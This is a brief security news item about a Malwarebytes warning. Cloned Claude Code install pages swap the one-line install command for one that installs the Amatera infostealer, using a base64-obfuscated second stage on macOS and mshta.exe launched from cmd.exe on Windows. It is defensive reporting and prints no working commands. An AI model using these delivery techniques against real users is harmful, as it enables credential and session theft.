MALWAREBYTES warns of fake Claude Code install pages targeting Windows and Mac users, where attackers clone pages and swap the one-liner install commands with malware to steal passwords, cookies, sessions and access to developer environments. The campaign, part of InstallFix, has the user run a remote script that executes with the user’s permissions, often those of an administrator.
The main payload is an infostealer named Amatera, which focuses on browser data, saved passwords, cookies, session tokens, autofill data and general system information to help hijack web sessions and access cloud dashboards. On macOS, the malicious one-liner typically pulls a second-stage script from an attacker-controlled domain, obfuscated with base64, which then downloads and runs a binary from another domain.
On Windows, the command has been seen spawning cmd[.]exe which then calls mshta[.]exe with a remote URL, allowing the malware to run as a trusted Microsoft binary while appearing to be a legitimate tool. The campaign was observed to target both platforms, underscoring the need for vigilance when following install instructions found online.